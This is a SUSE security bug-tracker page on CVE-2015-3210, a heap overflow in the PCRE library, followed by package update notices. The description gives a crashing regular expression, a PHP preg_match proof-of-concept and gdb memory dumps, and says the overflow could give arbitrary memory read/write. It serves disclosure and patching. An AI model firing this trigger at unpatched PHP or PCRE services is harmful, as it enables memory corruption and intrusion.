Bug 933288 (CVE-2015-3210) - VUL-1: CVE-2015-3210 pcre: heap buffer overflow in pcre_compile2() / compile_regex()
Summary: VUL-1: CVE-2015-3210 pcre: heap buffer overflow in pcre_compile2() / compile_...
Status: RESOLVED FIXED
Alias: CVE-2015-3210
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: Other Other
: P4 - Low : Minor
Target Milestone: ---
Assignee: Security Team bot
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/117246/
Whiteboard: CVSSv2:RedHat:CVE-2015-3210:4.3:(AV:N...
Keywords:
Depends on:
Blocks:
 
Reported: 2015-06-02 13:10 UTC by Andreas Stieger
Modified: 2019-07-05 22:39 UTC (History)
2 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Andreas Stieger 2015-06-02 13:10:38 UTC 
via oss-sec

Following issue was reorted in the PCRE library:

Latest version of PCRE is prone to a Heap Overflow vulnerability which could caused by the following regular expression.

/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/

To reproduce the problem, we could use pcretest provide by PCRE library or applications which is wrapped with PCRE such as PHP.
For pcretest, simply type the regular expression after the re>
For PHP, latest version of PHP 5.6.9 (wrapped with PCRE 8.37) could be triggered by following code snippet:

<?php
preg_match("/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/","ADLAB",$arr);
?>

First, pcre_compile2 invoke compile_regex() to calucate the size of memory that is used to save the regular expression.
re then points to the new allocated memory with the size above.
Next, pcre_compile2 invoke compile_regex() again to fill the regular expression into the allocated memory.
The problem here is that more data is written then expected.

Following test is conveyed under Kali Linux (based on Debian x64) with php 5.6.9:
==============================================================
gdb php poc.php
9217    re = (REAL_PCRE *)(PUBL(malloc))(size);
(gdb) x/10i $rip
=> 0x46f3cb <php_pcre_compile2+2187>:   mov    rdi,rbp
   0x46f3ce <php_pcre_compile2+2190>:   call   QWORD PTR [rax]
(gdb) x $rbp
   0x97:        Cannot access memory at address 0x97
==============================================================

So the expected size of the above regular expression is 0x97 = 151.
And the base address of allocated memory is 0x1007480.
Here is the layout of 0x1007480 just before the second compile_regexp:

==============================================================
(gdb) x/160x 0x1007480
0x1007480:     [0x45    0x52    0x43    0x50    0x97    0x00    0x00    0x00
0x1007488:      0x00    0x00    0x00    0x00    0x00    0x04    0x00    0x00
0x1007490:      0xff    0xff    0xff    0xff    0xff    0xff    0xff    0xff
0x1007498:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10074a0:      0x00    0x00    0x40    0x00    0x04    0x00    0x02    0x00
0x10074a8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10074b0:      0xd0    0x7a    0x00    0x01    0x00    0x00    0x00    0x00
0x10074b8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10074c0:      0x00    0x02    0x42    0x00    0x00    0x03    0x42    0x00
0x10074c8:      0x83    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10074d0:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10074d8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10074e0:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10074e8:      0x80    0x48    0xd8    0xf6    0xff    0x7f    0x00    0x00
0x10074f0:      0xff    0xff    0xff    0xff    0x00    0x00    0x00    0x00
0x10074f8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1007500:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1007508:      0x60    0x75    0x00    0x01    0x00    0x00    0x00    0x00
0x1007510:      0xff    0xff    0xff    0xff    0xff    0xff    0xff]   0xff
0x1007518:      0xa1    0x01    0x00    0x00    0x00    0x00    0x00    0x00
==============================================================

After the second compile_regexp:

==============================================================
(gdb) x/160x 0x1007480
0x1007480:     [0x45    0x52    0x43    0x50    0x97    0x00    0x00    0x00
0x1007488:      0x00    0x00    0x00    0x00    0x00    0x04    0x00    0x00
0x1007490:      0xff    0xff    0xff    0xff    0xff    0xff    0xff    0xff
0x1007498:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10074a0:      0x00    0x00    0x40    0x00    0x04    0x00    0x02    0x00
0x10074a8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10074b0:      0xd0    0x7a    0x00    0x01    0x00    0x00    0x00    0x00
0x10074b8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10074c0:      0x00    0x02    0x42    0x00    0x00    0x03    0x42    0x00
0x10074c8:      0x83    0x00    0x51    0x1b    0x73    0x00    0x00    0x00
0x10074d0:      0x02    0x85    0x00    0x45    0x00    0x01    0x73    0x00
0x10074d8:      0x00    0x00    0x02    0x83    0x00    0x22    0x85    0x00
0x10074e0:      0x07    0x00    0x02    0x1d    0x63    0x78    0x00    0x07
0x10074e8:      0x81    0x00    0x12    0x85    0x00    0x0c    0x00    0x03
0x10074f0:      0x1d    0x61    0x73    0x00    0x00    0x00    0x02    0x78
0x10074f8:      0x00    0x0c    0x78    0x00    0x12    0x78    0x00    0x22
0x1007500:      0x1d    0x3e    0x1d    0x57    0x1d    0x47    0x1d    0x58
0x1007508:      0x1d    0x43    0x1d    0x52    0x1d    0x45    0x1d    0x44
0x1007510:      0x1d    0x49    0x1d    0x54    0x1d    0x53    0x78]  *0x00
0x1007518:     *0x45   *0x78   *0x00   *0x51    0x00    0x00    0x00    0x00
==============================================================

Obviously, 5 more bytes is written on the heap in this case.
This overflow can be used to modify adjacent length field of array/vector/string, gaining the attacker the ability to read/write the whole memory 
in the context of the affected application (The same trick as CVE-2013-0634).
"""

Upstream bug: https://bugs.exim.org/show_bug.cgi?id=1636

> PCRE version > 8.33 (8.34, 8.35, 8.36, 8.37 are confirmed to be vulnerable).
> PCRE2 10.10 is also confirmed to be vulnerable. 


Confirmed reproducer causes
> *** Error in `pcretest': free(): invalid next size (normal): 0x0000000000707790 ***
on openSUSE 13.2 with fixes for  bug 924960, bug 924961, bug 906574 installed.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1226918
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3210
http://seclists.org/oss-sec/2015/q2/600
http://seclists.org/oss-sec/2015/q2/601
http://seclists.org/oss-sec/2015/q2/602
http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-3210.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3210
Comment 1 Swamp Workflow Management 2015-06-02 22:00:34 UTC 
bugbot adjusting priority
Comment 3 Bernhard Wiedemann 2016-10-28 18:00:26 UTC 
This is an autogenerated message for OBS integration:
This bug (933288) was mentioned in
https://build.opensuse.org/request/show/437711 13.2 / pcre
Comment 4 Swamp Workflow Management 2016-11-15 17:13:23 UTC 
openSUSE-SU-2016:2805-1: An update that solves 6 vulnerabilities and has three fixes is now available.

Category: security (moderate)
Bug References: 933288,933878,936227,942865,957566,957598,960837,971741,972127
CVE References: CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2016-1283,CVE-2016-3191
Sources used:
openSUSE 13.2 (src):    pcre-8.39-3.8.1
Comment 5 Swamp Workflow Management 2016-12-02 15:08:21 UTC 
SUSE-SU-2016:2971-1: An update that fixes 25 vulnerabilities is now available.

Category: security (moderate)
Bug References: 906574,924960,933288,933878,936227,942865,957566,957567,957598,957600,960837,971741,972127
CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2327,CVE-2015-2328,CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2015-8381,CVE-2015-8382,CVE-2015-8383,CVE-2015-8384,CVE-2015-8385,CVE-2015-8386,CVE-2015-8387,CVE-2015-8388,CVE-2015-8389,CVE-2015-8390,CVE-2015-8391,CVE-2015-8392,CVE-2015-8393,CVE-2015-8394,CVE-2015-8395,CVE-2016-1283,CVE-2016-3191
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP2 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Workstation Extension 12-SP1 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Software Development Kit 12-SP2 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Server 12-SP2 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Server 12-SP1 (src):    pcre-8.39-5.1
SUSE Linux Enterprise High Availability 12-SP2 (src):    pcre-8.39-5.1
SUSE Linux Enterprise High Availability 12-SP1 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Desktop 12-SP2 (src):    pcre-8.39-5.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    pcre-8.39-5.1
Comment 6 Swamp Workflow Management 2016-12-12 18:12:05 UTC 
openSUSE-SU-2016:3099-1: An update that fixes 25 vulnerabilities is now available.

Category: security (moderate)
Bug References: 906574,924960,933288,933878,936227,942865,957566,957567,957598,957600,960837,971741,972127
CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2327,CVE-2015-2328,CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2015-8381,CVE-2015-8382,CVE-2015-8383,CVE-2015-8384,CVE-2015-8385,CVE-2015-8386,CVE-2015-8387,CVE-2015-8388,CVE-2015-8389,CVE-2015-8390,CVE-2015-8391,CVE-2015-8392,CVE-2015-8393,CVE-2015-8394,CVE-2015-8395,CVE-2016-1283,CVE-2016-3191
Sources used:
openSUSE Leap 42.2 (src):    pcre-8.39-6.1
openSUSE Leap 42.1 (src):    pcre-8.39-5.1
Comment 7 Swamp Workflow Management 2016-12-15 15:08:06 UTC 
SUSE-SU-2016:3161-1: An update that fixes 25 vulnerabilities is now available.

Category: security (moderate)
Bug References: 906574,924960,933288,933878,936227,942865,957566,957567,957598,957600,960837,971741,972127
CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2327,CVE-2015-2328,CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2015-8381,CVE-2015-8382,CVE-2015-8383,CVE-2015-8384,CVE-2015-8385,CVE-2015-8386,CVE-2015-8387,CVE-2015-8388,CVE-2015-8389,CVE-2015-8390,CVE-2015-8391,CVE-2015-8392,CVE-2015-8393,CVE-2015-8394,CVE-2015-8395,CVE-2016-1283,CVE-2016-3191
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP2 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Workstation Extension 12-SP1 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Software Development Kit 12-SP2 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Server for SAP 12 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Server 12-SP2 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Server 12-SP1 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Server 12-LTSS (src):    pcre-8.39-7.1
SUSE Linux Enterprise High Availability 12-SP2 (src):    pcre-8.39-7.1
SUSE Linux Enterprise High Availability 12-SP1 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Desktop 12-SP2 (src):    pcre-8.39-7.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    pcre-8.39-7.1
Comment 8 Stephan Kulow 2017-05-24 17:59:35 UTC 
looks fixed to me, but reevalute yourself
Comment 9 Johannes Segitz 2017-08-04 11:35:44 UTC 
is fixed